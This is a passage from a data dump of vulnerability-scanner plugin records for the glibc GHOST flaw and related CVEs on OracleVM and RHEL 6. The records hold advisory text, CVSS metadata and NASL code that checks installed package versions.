hosts in gethostbyname_r\n (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support\n (CVE-2014-5119, - _nl_find_locale: Improve handling of\n crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd\n daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups\n (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly\n count the number of hardware threads sharing a cacheline\n (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers\n (#957089).\n\n - Test on init_fct, not result->__init_fct, after\n demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp\n (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application\n crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code\n with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked\n (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available\n (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. 
(#857387)\n\n - Handle failure of _nl_explode_name in all cases\n (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to\n manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by\n 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in\n strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding\n modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character\n 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name\n containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and\n others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's\n in current working directory. 
(#808342)\n\n - Incorrect initialization order for dynamic loader\n (#813348)\n\n - Fix return code when stopping already stopped nscd\n daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use\n MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher\n (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make\n implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias\n (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members\n (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency\n (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel\n (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints\n (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists\n (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to\n bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000261.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b908cf01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd 
packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T16:31:36", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer overflow (#1296028).\n\n - 
Support loading more libraries with static TLS (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been temporarily removed since it triggers deadlocks in certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix (#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512 (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2 (#867679).\n\n - Enhance nscd to detect any configuration file changes (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random fd (CVE-2013-7423, - Implement userspace half of in6.h header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183534).\n\n - 
Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817, #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423", "CVE-2014-6040", "CVE-2014-7817", "CVE-2015-0235", "CVE-2015-1781", "CVE-2015-7547"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2016-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/88783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory 
OVMSA-2016-0013.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88783);\n script_version(\"2.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-7423\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\", \"CVE-2015-1781\", \"CVE-2015-7547\");\n script_bugtraq_id(69472, 71216, 72325, 72844, 74255);\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO\n and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer\n overflow (#1296028).\n\n - Support loading more libraries with static TLS\n (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure\n (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte\n (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been\n temporarily removed since it triggers deadlocks in\n certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user\n checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts\n (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix\n 
(#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned\n buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512\n (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC\n records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2\n (#867679).\n\n - Enhance nscd to detect any configuration file changes\n (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL\n (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage\n variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random\n fd (CVE-2013-7423, - Implement userspace half of in6.h\n header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler\n (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of\n DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups\n have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc\n (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183534).\n\n - Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817,\n #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-February/000418.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?92d5b0bd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / 
glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:48", "description": "An updated rhev-hypervisor6 package that fixes multiple security issues is now available for Red Hat Enterprise Virtualization 3.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA race condition flaw was found in the way the Linux kernel's KVM subsystem handled PIT (Programmable Interval Timer) emulation. A guest user who has access to the PIT I/O ports could use this flaw to crash the host. (CVE-2014-3611)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. A man-in-the-middle attacker could use this flaw to force a TLS/SSL server using OpenSSL to use TLS 1.0, even if both the client and the server supported newer protocol versions. (CVE-2014-3511)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server. 
(CVE-2014-3567)\n\nIt was found that the Linux kernel's KVM subsystem did not handle the VM exits gracefully for the invept (Invalidate Translations Derived from EPT) and invvpid (Invalidate Translations Based on VPID) instructions. On hosts with an Intel processor and invept/invppid VM exit support, an unprivileged guest user could use these instructions to crash the guest. (CVE-2014-3645, CVE-2014-3646)\n\nRed Hat would like to thank Qualys for reporting the CVE-2015-0235 issue, Lars Bull of Google for reporting the CVE-2014-3611 issue, and the Advanced Threat Research team at Intel Security for reporting the CVE-2014-3645 and CVE-2014-3646 issues.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2015-02-06T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2015:0126) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3511", "CVE-2014-3567", "CVE-2014-3611", "CVE-2014-3645", "CVE-2014-3646", "CVE-2015-0235"], "modified": "2021-02-05T00:00:00", "cpe": 
["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0126.NASL", "href": "https://www.tenable.com/plugins/nessus/81200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81200);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2014-3511\", \"CVE-2014-3567\", \"CVE-2014-3611\", \"CVE-2014-3645\", \"CVE-2014-3646\", \"CVE-2015-0235\");\n script_bugtraq_id(70743, 70745, 70746);\n script_xref(name:\"RHSA\", value:\"2015:0126\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2015:0126) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An updated rhev-hypervisor6 package that fixes multiple security\nissues is now available for Red Hat Enterprise Virtualization 3.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. 
It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nA race condition flaw was found in the way the Linux kernel's KVM\nsubsystem handled PIT (Programmable Interval Timer) emulation. A guest\nuser who has access to the PIT I/O ports could use this flaw to crash\nthe host. (CVE-2014-3611)\n\nA flaw was found in the way OpenSSL handled fragmented handshake\npackets. A man-in-the-middle attacker could use this flaw to force a\nTLS/SSL server using OpenSSL to use TLS 1.0, even if both the client\nand the server supported newer protocol versions. (CVE-2014-3511)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nIt was found that the Linux kernel's KVM subsystem did not handle the\nVM exits gracefully for the invept (Invalidate Translations Derived\nfrom EPT) and invvpid (Invalidate Translations Based on VPID)\ninstructions. On hosts with an Intel processor and invept/invppid VM\nexit support, an unprivileged guest user could use these instructions\nto crash the guest. 
(CVE-2014-3645, CVE-2014-3646)\n\nRed Hat would like to thank Qualys for reporting the CVE-2015-0235\nissue, Lars Bull of Google for reporting the CVE-2014-3611 issue, and\nthe Advanced Threat Research team at Intel Security for reporting the\nCVE-2014-3645 and CVE-2014-3646 issues.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rhev-hypervisor6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 